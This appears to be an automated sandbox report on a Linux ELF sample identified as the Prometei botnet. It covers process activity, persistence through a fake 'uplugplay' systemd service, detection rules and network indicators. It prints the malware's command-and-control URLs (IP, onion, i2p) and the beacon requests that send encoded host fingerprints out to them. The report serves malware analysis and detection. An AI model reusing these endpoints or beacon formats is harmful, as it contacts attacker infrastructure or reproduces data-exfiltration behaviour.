Create Interactive Tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1652686
MD5:f754da11d56273194970ea9f6544059b
SHA1:5ee995882b4aa653bc083baaf7a4a3b40e2cb76a
SHA256:3be1ec38a9cc8197f4b764d0adcb75939180767e0d55c6ab1d40071220c94520
Tags:elfuser-abuse_ch
Infos:

Detection

Prometei
Score:100
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Prometei
Drops files in suspicious directories
Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)
Found Tor onion address
Sample deletes itself
Sample is packed with UPX
Creates hidden files and/or directories
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "pgrep" command search for and/or send signals to processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "uname" command used to read OS and architecture name
HTTP GET or POST without a user agent
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Sample tries to set the executable flag
Suricata IDS alerts with low severity for network traffic
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1652686
Start date and time:2025-03-31 11:42:12 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 2s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal100.troj.evad.linELF@0/13@1/0
  • VT rate limit hit for: http://152.36.128.18/cgi-bin/p.cgi?r=15&i=8458VTJT921KQOYZ
Command:/tmp/na.elf
PID:6201
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Starting...
System install...OK
Standard Error:Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.
  • system is lnxubuntu20
  • na.elf (PID: 6201, Parent: 6113, MD5: f754da11d56273194970ea9f6544059b) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 6204, Parent: 6201)
    • sh (PID: 6204, Parent: 6201, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep na.elf"
      • sh New Fork (PID: 6205, Parent: 6204)
      • pgrep (PID: 6205, Parent: 6204, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep na.elf
    • na.elf New Fork (PID: 6208, Parent: 6201)
    • sh (PID: 6208, Parent: 6201, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof na.elf"
      • sh New Fork (PID: 6209, Parent: 6208)
      • pidof (PID: 6209, Parent: 6208, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof na.elf
    • na.elf New Fork (PID: 6212, Parent: 6201)
    • sh (PID: 6212, Parent: 6201, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"
      • sh New Fork (PID: 6213, Parent: 6212)
      • pgrep (PID: 6213, Parent: 6212, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay
    • na.elf New Fork (PID: 6218, Parent: 6201)
    • sh (PID: 6218, Parent: 6201, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof uplugplay"
      • sh New Fork (PID: 6219, Parent: 6218)
      • pidof (PID: 6219, Parent: 6218, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof uplugplay
    • na.elf New Fork (PID: 6222, Parent: 6201)
    • sh (PID: 6222, Parent: 6201, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"
      • sh New Fork (PID: 6223, Parent: 6222)
      • pgrep (PID: 6223, Parent: 6222, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup
    • na.elf New Fork (PID: 6226, Parent: 6201)
    • sh (PID: 6226, Parent: 6201, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"
      • sh New Fork (PID: 6227, Parent: 6226)
      • pidof (PID: 6227, Parent: 6226, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup
    • na.elf New Fork (PID: 6228, Parent: 6201)
    • sh (PID: 6228, Parent: 6201, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
      • sh New Fork (PID: 6229, Parent: 6228)
      • systemctl (PID: 6229, Parent: 6228, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • na.elf New Fork (PID: 6246, Parent: 6201)
    • sh (PID: 6246, Parent: 6201, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"
      • sh New Fork (PID: 6247, Parent: 6246)
      • systemctl (PID: 6247, Parent: 6246, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service
    • na.elf New Fork (PID: 6251, Parent: 6201)
    • sh (PID: 6251, Parent: 6201, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"
      • sh New Fork (PID: 6252, Parent: 6251)
      • systemctl (PID: 6252, Parent: 6251, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service
  • systemd New Fork (PID: 6231, Parent: 6230)
  • snapd-env-generator (PID: 6231, Parent: 6230, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6249, Parent: 6248)
  • snapd-env-generator (PID: 6249, Parent: 6248, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6253, Parent: 1)
  • uplugplay (PID: 6253, Parent: 1, MD5: f754da11d56273194970ea9f6544059b) Arguments: /usr/sbin/uplugplay
    • uplugplay New Fork (PID: 6254, Parent: 6253)
      • sh (PID: 6255, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"
        • sh New Fork (PID: 6256, Parent: 6255)
        • uplugplay (PID: 6256, Parent: 6255, MD5: f754da11d56273194970ea9f6544059b) Arguments: /usr/sbin/uplugplay -Dcomsvc
          • sh (PID: 6260, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl
            • sh New Fork (PID: 6261, Parent: 6260)
            • hostnamectl (PID: 6261, Parent: 6260, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl
          • sh (PID: 6264, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl
            • sh New Fork (PID: 6265, Parent: 6264)
            • hostnamectl (PID: 6265, Parent: 6264, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl
          • sh (PID: 6404, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6407, Parent: 6404)
            • dmidecode (PID: 6407, Parent: 6404, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6408, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 6409, Parent: 6408)
            • uptime (PID: 6409, Parent: 6408, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 6414, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c dmidecode
            • sh New Fork (PID: 6415, Parent: 6414)
            • dmidecode (PID: 6415, Parent: 6414, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode
          • sh (PID: 6418, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 6419, Parent: 6418)
            • uname (PID: 6419, Parent: 6418, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
          • sh (PID: 6422, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 6423, Parent: 6422)
            • uptime (PID: 6423, Parent: 6422, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 6426, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 6427, Parent: 6426)
            • uname (PID: 6427, Parent: 6426, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
  • systemd New Fork (PID: 6266, Parent: 1)
  • systemd-hostnamed (PID: 6266, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed
  • fwupd New Fork (PID: 6439, Parent: 1)
  • gpg (PID: 6439, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: /usr/bin/gpg --version
  • fwupd New Fork (PID: 6441, Parent: 1)
  • gpg (PID: 6441, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
  • fwupd New Fork (PID: 6443, Parent: 1)
  • gpg (PID: 6443, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
  • fwupd New Fork (PID: 6445, Parent: 1)
  • gpg (PID: 6445, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
  • fwupd New Fork (PID: 6447, Parent: 1)
  • gpg (PID: 6447, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
  • dash New Fork (PID: 6502, Parent: 4331)
  • rm (PID: 6502, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.79LwtjX6wQ /tmp/tmp.udDZnLgcZV /tmp/tmp.DF8pyLiTt4
  • dash New Fork (PID: 6503, Parent: 4331)
  • rm (PID: 6503, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.79LwtjX6wQ /tmp/tmp.udDZnLgcZV /tmp/tmp.DF8pyLiTt4
  • cleanup
SourceRuleDescriptionAuthorStrings
na.elfLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
SourceRuleDescriptionAuthorStrings
/usr/sbin/uplugplayLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
SourceRuleDescriptionAuthorStrings
6201.1.0000000000401000.00000000004f9000.r-x.sdmpLinux_Hacktool_Flooder_1a4eb229unknownunknown
  • 0x9beb:$a: F4 8B 45 E8 83 C0 01 89 45 F8 EB 0F 8B 45 E8 83 C0 01 89 45 F4 8B
6201.1.0000000000401000.00000000004f9000.r-x.sdmpLinux_Hacktool_Flooder_f454ec10unknownunknown
  • 0xb569:$a: 8B 45 EC 48 63 D0 48 8B 45 D0 48 01 D0 0F B6 00 3C 2E 75 4D 8B
6201.1.000000000052d000.0000000001575000.rw-.sdmpLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x7190db:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
Process Memory Space: na.elf PID: 6201JoeSecurity_PrometeiYara detected PrometeiJoe Security
    Process Memory Space: na.elf PID: 6201JoeSecurity_Prometei_1Yara detected PrometeiJoe Security
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-31T11:45:09.706681+020020445601A Network Trojan was detected192.168.2.23588648.8.8.853UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-31T11:43:04.248807+020028033053Unknown Traffic192.168.2.2358304152.36.128.1880TCP
      2025-03-31T11:43:08.404821+020028033053Unknown Traffic192.168.2.2358306152.36.128.1880TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: na.elfAvira: detected
      Source: /usr/sbin/uplugplayAvira: detection malicious, Label: LINUX/GM.Agent.JQ
      Source: na.elfVirustotal: Detection: 36%Perma Link
      Source: na.elfReversingLabs: Detection: 47%

      Bitcoin Miner

      barindex
      Source: Yara matchFile source: Process Memory Space: na.elf PID: 6201, type: MEMORYSTR
      Source: /usr/sbin/uplugplay (PID: 6256)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
      Source: /usr/bin/pgrep (PID: 6205)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6213)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6256)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/uptime (PID: 6409)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/uptime (PID: 6423)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2044560 - Severity 1 - ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern : 192.168.2.23:58864 -> 8.8.8.8:53
      Source: na.elf, 6201.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
      Source: na.elf, 6201.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: nNhttp://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug
      Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?r=15&i=8458VTJT921KQOYZ HTTP/1.0Host: 152.36.128.18
      Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIyBkbWlkZWNvZGUgMy4yfDE3NDM0MTQxODYNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=8458VTJT921KQOYZ&h=galassia&enckey=T3H7yKYl9LzrnzjTk1kj3/IIrRpU5KqKM2QjRbIrLf+P0lYOdKDUznLMbT8ikKacjb5gwGXO/3gz/i1RyBruWAkeC2wdEnkGfZcQyfTqx6El4sI9cXAdspx1OC0+58WLk+ZhXrGRzNnPEJGxk8bI6l8552kadBpr8dz0jWCByhs= HTTP/1.0Host: 152.36.128.18
      Source: /usr/sbin/uplugplay (PID: 6256)Socket: 0.0.0.0:89Jump to behavior
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58304 -> 152.36.128.18:80
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58306 -> 152.36.128.18:80
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?r=15&i=8458VTJT921KQOYZ HTTP/1.0Host: 152.36.128.18
      Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIyBkbWlkZWNvZGUgMy4yfDE3NDM0MTQxODYNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=8458VTJT921KQOYZ&h=galassia&enckey=T3H7yKYl9LzrnzjTk1kj3/IIrRpU5KqKM2QjRbIrLf+P0lYOdKDUznLMbT8ikKacjb5gwGXO/3gz/i1RyBruWAkeC2wdEnkGfZcQyfTqx6El4sI9cXAdspx1OC0+58WLk+ZhXrGRzNnPEJGxk8bI6l8552kadBpr8dz0jWCByhs= HTTP/1.0Host: 152.36.128.18
      Source: global trafficDNS traffic detected: DNS query: xinchaodbcfda.com
      Source: na.elf, uplugplay.12.drString found in binary or memory: http://152.36.128
      Source: na.elf, 6201.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://152.36.128.18/cgi-bin/p.cgi
      Source: na.elf, 6201.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni
      Source: na.elf, 6201.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
      Source: na.elf, 6201.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
      Source: na.elf, uplugplay.12.drString found in binary or memory: http://upx.sf.net
      Source: na.elf, 6201.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
      Source: unknownNetwork traffic detected: HTTP traffic on port 39246 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39246
      Source: unknownNetwork traffic detected: HTTP traffic on port 55242 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55242
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

      System Summary

      barindex
      Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
      Source: 6201.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_1a4eb229 Author: unknown
      Source: 6201.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_f454ec10 Author: unknown
      Source: 6201.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
      Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
      Source: LOAD without section mappingsProgram segment: 0x400000
      Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
      Source: 6201.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_1a4eb229 reference_sample = bf6f3ffaf94444a09b69cbd4c8c0224d7eb98eb41514bdc3f58c1fb90ac0e705, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = de076ef23c2669512efc00ddfe926ef04f8ad939061c69131a0ef9a743639371, id = 1a4eb229-a194-46a5-8e93-370a40ba999b, last_modified = 2021-09-16
      Source: 6201.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_f454ec10 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 0297e1ad6e180af85256a175183102776212d324a2ce0c4f32e8a44a2e2e9dad, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = 2ae5e2c3190a4ce5d238efdb10ac0520987425fb7af52246b6bf948abd0259da, id = f454ec10-7a67-4717-9e95-fecb7c357566, last_modified = 2022-01-26
      Source: 6201.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
      Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
      Source: classification engineClassification label: mal100.troj.evad.linELF@0/13@1/0

      Data Obfuscation

      barindex
      Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
      Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
      Source: initial sampleString containing UPX found: $Id: UPX 4.24 Copyright (C) 1996-2024 the UPX Team. All Rights Reserved. $
      Source: /usr/bin/pidof (PID: 6209)Directory: //.Jump to behavior
      Source: /usr/bin/pidof (PID: 6219)Directory: //.Jump to behavior
      Source: /usr/bin/pidof (PID: 6227)Directory: //.Jump to behavior
      Source: /lib/systemd/systemd-hostnamed (PID: 6266)Directory: <invalid fd (10)>/..Jump to behavior
      Source: /usr/bin/gpg (PID: 6441)File: /var/lib/fwupd/gnupg/.#lk0x000055f0f7832b80.galassia.6441Jump to behavior
      Source: /usr/bin/gpg (PID: 6443)File: /var/lib/fwupd/gnupg/.#lk0x000055c74090fb80.galassia.6443Jump to behavior
      Source: /usr/bin/gpg (PID: 6445)File: /var/lib/fwupd/gnupg/.#lk0x000055cb9acaeb80.galassia.6445Jump to behavior
      Source: /usr/bin/gpg (PID: 6447)File: /var/lib/fwupd/gnupg/.#lk0x000055889a961b80.galassia.6447Jump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1582/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1582/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/3088/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/3088/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/230/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/230/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/110/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/110/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/231/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/231/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/111/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/111/cmdlineJump to behavior
